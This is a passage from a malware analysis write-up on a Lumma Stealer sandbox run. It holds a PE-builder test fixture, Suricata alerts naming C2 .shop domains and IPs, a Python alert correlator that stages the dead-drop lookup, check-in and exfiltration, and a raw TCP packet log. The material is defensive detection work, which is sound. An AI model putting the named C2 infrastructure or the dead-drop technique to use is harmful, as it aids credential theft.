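    """Constructed PE32 shaped like the table (.text, writable .data holding the IAT, .symtab); not the sample."""
    code = bytes([0xCC] * 8) + bytes.fromhex("8b4c24048b118bc4")  # int3 padding, then the prologue shown above
    secs = [(b".text", 0x1000, 0x200, code.ljust(0x200, b"\0"), IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
            (b".data", 0x2000, 0x400, bytes(range(256)) * 2, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
            (b".symtab", 0x3000, 0x4, bytes(0x200), IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ)]
    hdr_size, ptr, sec_hdrs, raw = 0x400, 0x400, b"", b""
    for name, va, vsize, data, chars in secs:
        sec_hdrs += struct.pack(SEC_HDR, name, vsize, va, len(data), ptr, 0, 0, 0, 0, chars)
        ptr, raw = ptr + len(data), raw + data
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0x200, 0x600, 0, 0x1008, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0,
                       0x4000, hdr_size, 0, 3, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    # 16 data directories; only entry 12 (IAT) is set, inside .data as in the table
    opt += struct.pack("<II", 0, 0) * 12 + struct.pack("<II", 0x2020, 0xA0) + struct.pack("<II", 0, 0) * 3
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x0102)
    dos = (b"MZ" + bytes(0x3A) + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    return (dos + b"PE\0\0" + file_hdr + opt + sec_hdrs).ljust(hdr_size, b"\0") + raw
```

Run over the page's import list, triage_imports returns the four thread-context APIs but no remote allocate/write primitive, and flags the table as a Go runtime profile: every one of those kernel32 entries is what the Go linker emits for its own scheduler and I/O completion port netpoller, so SuspendThread/SetThreadContext/ResumeThread here are not by themselves evidence of thread hijacking. The "Allocates memory in foreign processes" and "Injects a PE file into a foreign processes" behaviour in the signature list must therefore come from APIs resolved at run time through the imported GetProcAddress and LoadLibraryA rather than from the static import table. The 4-byte, discardable .symtab section is the second Go fingerprint.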
Suricata IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T06:01:53.190389+0100 | 2058616 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) | 1 | 192.168.2.12 | 53987 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.201766+0100 | 2058598 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) | 1 | 192.168.2.12 | 61164 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.213434+0100 | 2058632 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) | 1 | 192.168.2.12 | 60382 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.224916+0100 | 2058610 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) | 1 | 192.168.2.12 | 59491 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.235108+0100 | 2058628 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) | 1 | 192.168.2.12 | 60843 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.245728+0100 | 2058618 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) | 1 | 192.168.2.12 | 52344 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.257267+0100 | 2058622 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) | 1 | 192.168.2.12 | 50381 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.268439+0100 | 2058606 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) | 1 | 192.168.2.12 | 55305 | 1.1.1.1 | 53 | UDP
2025-01-07T06:01:53.949040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49714 | 104.102.49.254 | 443 | TCP
2025-01-07T06:01:54.486321+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.12 | 49714 | 104.102.49.254 | 443 | TCP
2025-01-07T06:01:55.095658+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:55.679027+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:55.679027+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.12 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:56.178686+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:56.656307+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:56.656307+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.12 | 49716 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:57.515055+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49717 | 104.21.112.1 | 443 | TCP
2025-01-07T06:01:58.799997+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49718 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:00.041788+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49719 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:02.028689+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49720 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:03.345579+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49721 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:04.152149+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.12 | 49721 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:04.676158+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.12 | 49722 | 104.21.112.1 | 443 | TCP
2025-01-07T06:02:05.172574+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.12 | 49722 | 104.21.112.1 | 443 | TCP
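Read as a SOC analyst would, the alert table above carries three distinct signals: a burst of DNS lookups for the embedded C2 domain list (one every 10 to 12 ms), a low-severity JA3 hit on every TLS connection the sample opens, and severity-1 Lumma alerts that land on only some of those connections. The Python below is an added example, not the report's or Suricata's own code: it correlates alert records that mirror a subset of the table (the rows are rebuilt here as constructed input, not read from an eve.json the page provides) into a per-host DNS burst, per-flow escalation chains keyed by 5-tuple, and a staged timeline. The window, threshold and stage labels are the author's choices; the "dead-drop resolver" label for the Steam profile lookup reflects Lumma's documented use of Steam profile pages to publish its live C2 address.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed alert rows mirroring a subset of the Suricata table above (built for this example, not the
# report's eve.json): (timestamp, sid, severity, src_port, dest_ip, dest_port, proto, signature)
SRC = "192.168.2.12"
DNS_SIG = "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup"
JA3_SIG = "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"
ROWS = [
    ("2025-01-07T06:01:53.190389+0100", 2058616, 1, 53987, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (nearycrepso .shop)"),
    ("2025-01-07T06:01:53.201766+0100", 2058598, 1, 61164, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (abruptyopsn .shop)"),
    ("2025-01-07T06:01:53.213434+0100", 2058632, 1, 60382, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (wholersorie .shop)"),
    ("2025-01-07T06:01:53.224916+0100", 2058610, 1, 59491, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (framekgirus .shop)"),
    ("2025-01-07T06:01:53.235108+0100", 2058628, 1, 60843, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (tirepublicerj .shop)"),
    ("2025-01-07T06:01:53.245728+0100", 2058618, 1, 52344, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (noisycuttej .shop)"),
    ("2025-01-07T06:01:53.257267+0100", 2058622, 1, 50381, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (rabidcowse .shop)"),
    ("2025-01-07T06:01:53.268439+0100", 2058606, 1, 55305, "1.1.1.1", 53, "UDP", f"{DNS_SIG} (cloudewahsj .shop)"),
    ("2025-01-07T06:01:53.949040+0100", 2028371, 3, 49714, "104.102.49.254", 443, "TCP", JA3_SIG),
    ("2025-01-07T06:01:54.486321+0100", 2858666, 1, 49714, "104.102.49.254", 443, "TCP",
     "ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup"),
    ("2025-01-07T06:01:55.095658+0100", 2028371, 3, 49715, "104.21.112.1", 443, "TCP", JA3_SIG),
    ("2025-01-07T06:01:55.679027+0100", 2054653, 1, 49715, "104.21.112.1", 443, "TCP", "ET MALWARE Lumma Stealer CnC Host Checkin"),
    ("2025-01-07T06:01:57.515055+0100", 2028371, 3, 49717, "104.21.112.1", 443, "TCP", JA3_SIG),
    ("2025-01-07T06:02:03.345579+0100", 2028371, 3, 49721, "104.21.112.1", 443, "TCP", JA3_SIG),
    ("2025-01-07T06:02:04.152149+0100", 2048094, 1, 49721, "104.21.112.1", 443, "TCP",
     "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration"),
]

def to_records(rows) -> list:
    return [{"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), "sid": sid, "severity": sev, "src_ip": SRC,
             "src_port": sp, "dest_ip": dip, "dest_port": dp, "proto": proto, "sig": sig}
            for ts, sid, sev, sp, dip, dp, proto, sig in rows]

# ET writes the domain defanged as "name .tld" at the end of the signature text
DOMAIN_RE = re.compile(r"\(([a-z0-9-]+) ?\.([a-z]+)\)$")

def dns_domain_burst(records, window_s=1.0, min_domains=3) -> dict:
    """Distinct Lumma C2 domains a host resolves inside one window. The sample walks its embedded C2
    list in quick succession, so the burst is the signal, not any single lookup."""
    per_host = defaultdict(list)
    for r in records:
        m = DOMAIN_RE.search(r["sig"])
        if r["dest_port"] == 53 and m:
            per_host[r["src_ip"]].append((r["ts"], f"{m.group(1)}.{m.group(2)}"))
    hits = {}
    for host, lookups in per_host.items():
        lookups.sort()
        for i, (t0, _) in enumerate(lookups):
            in_window = sorted({d for t, d in lookups[i:] if (t - t0).total_seconds() <= window_s})
            if len(in_window) >= min_domains:
                hits[host] = in_window
                break
    return hits

def flow_chains(records) -> dict:
    """TCP alerts grouped by 5-tuple; keep only flows where the severity-3 JA3 hit on the TLS hello is
    followed by a severity-1 Lumma alert on the same connection (the JA3 hit alone is too noisy to page on)."""
    flows = defaultdict(list)
    for r in records:
        if r["proto"] == "TCP":
            flows[(r["src_ip"], r["src_port"], r["dest_ip"], r["dest_port"])].append(r)
    chains = {}
    for key, alerts in flows.items():
        alerts.sort(key=lambda a: a["ts"])
        ja3 = next((a["ts"] for a in alerts if a["sid"] == 2028371), None)
        escalations = [a for a in alerts if a["severity"] == 1 and ja3 is not None and a["ts"] >= ja3]
        if escalations:
            chains[key] = (alerts[0]["ts"], [a["sig"] for a in escalations])
    return chains

def stage(sig: str) -> str:
    # Lumma fetches its live C2 from a Steam profile page (dead-drop resolver) before the real check-in
    if "Steam Profile" in sig:
        return "dead-drop resolver"
    if "Checkin" in sig:
        return "c2 check-in"
    if "Exfiltration" in sig:
        return "exfiltration"
    return "other"

def kill_chain(records) -> list:
    """(src_port, dest_ip, stage) for every escalated flow, in the order the flows started."""
    chains = sorted(flow_chains(records).items(), key=lambda kv: kv[1][0])
    return [(key[1], key[2], stage(s)) for key, (_, sigs) in chains for s in sigs]
```

With the defaults, dns_domain_burst reports all eight .shop domains for 192.168.2.12 inside one second; shrinking the window to 15 ms drops the hit, which is the knob to tune against a host that legitimately resolves a few domains at once. flow_chains keeps 49714, 49715 and 49721 and discards 49717, where the JA3 signature fired alone, and kill_chain orders the survivors as resolver, check-in, exfiltration: one TLS session per C2 request, each on a fresh ephemeral port, which is also what the packet list below shows.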
TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 06:01:53.291867018 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:53.291925907 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:53.292013884 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:53.295408010 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:53.295442104 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:53.948965073 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:53.949039936 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:53.953980923 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:53.953994989 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:53.954276085 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:53.995117903 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.006622076 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.047343969 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486373901 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486409903 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486438036 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486454964 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486463070 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.486481905 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486491919 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.486500978 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.486500978 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.486573935 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.585752010 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.585779905 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.585870028 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.585895061 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.585935116 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.589031935 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.589097977 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.589104891 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.589134932 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.589142084 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.589176893 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.590756893 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.590775013 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.590792894 CET | 49714 | 443 | 192.168.2.12 | 104.102.49.254
Jan 7, 2025 06:01:54.590797901 CET | 443 | 49714 | 104.102.49.254 | 192.168.2.12
Jan 7, 2025 06:01:54.628607988 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:54.628647089 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:54.628730059 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:54.629106045 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:54.629121065 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.095558882 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.095658064 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.262940884 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.262968063 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.263346910 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.264794111 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.264810085 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.264878988 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.679042101 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.679150105 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.679218054 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.679440975 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.679450989 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.679480076 CET | 49715 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.679486036 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.712291956 CET | 49716 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.712332964 CET | 443 | 49716 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:55.712407112 CET | 49716 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.712692022 CET | 49716 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:55.712706089 CET | 443 | 49716 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:56.178581953 CET | 443 | 49716 | 104.21.112.1 | 192.168.2.12
Jan 7, 2025 06:01:56.178685904 CET | 49716 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:56.180049896 CET | 49716 | 443 | 192.168.2.12 | 104.21.112.1
Jan 7, 2025 06:01:56.180064917 CET | 443 | 49716 | 104.21.112.1 | 192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.180309057 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.181669950 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.181699991 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.181730986 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656326056 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656404972 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656435966 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656483889 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656510115 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656518936 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656529903 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656567097 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.656584024 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657234907 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657330036 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657382965 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.657391071 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661396980 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661427975 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661477089 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661483049 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.661535025 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.744726896 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.744869947 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.744998932 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745512009 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745528936 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745541096 CET49716443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:56.745547056 CET44349716104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.036607981 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.036636114 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.036696911 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.037017107 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.037028074 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.514966011 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.515054941 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.516274929 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.516283035 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.516532898 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.519531965 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.519649982 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:57.519680977 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.091483116 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.091594934 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.091645002 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.092164993 CET49717443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.092181921 CET44349717104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336358070 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336409092 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336498976 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336911917 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.336927891 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.799793959 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.799997091 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.801248074 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.801258087 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.801500082 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802834034 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802896023 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802923918 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802923918 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802944899 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.802982092 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:58.803004026 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.287743092 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.287846088 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.291896105 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.292052984 CET49718443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.292069912 CET44349718104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580478907 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580562115 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580645084 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580956936 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:59.580979109 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.041671991 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.041788101 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.043169975 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.043180943 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.043440104 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044734955 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044873953 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044919014 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044986963 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.044998884 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.545706034 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.545816898 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.545872927 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.546125889 CET49719443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:00.546142101 CET44349719104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555162907 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555202007 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555260897 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555571079 CET49720443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:01.555587053 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.028580904 CET44349720104.21.112.1192.168.2.12
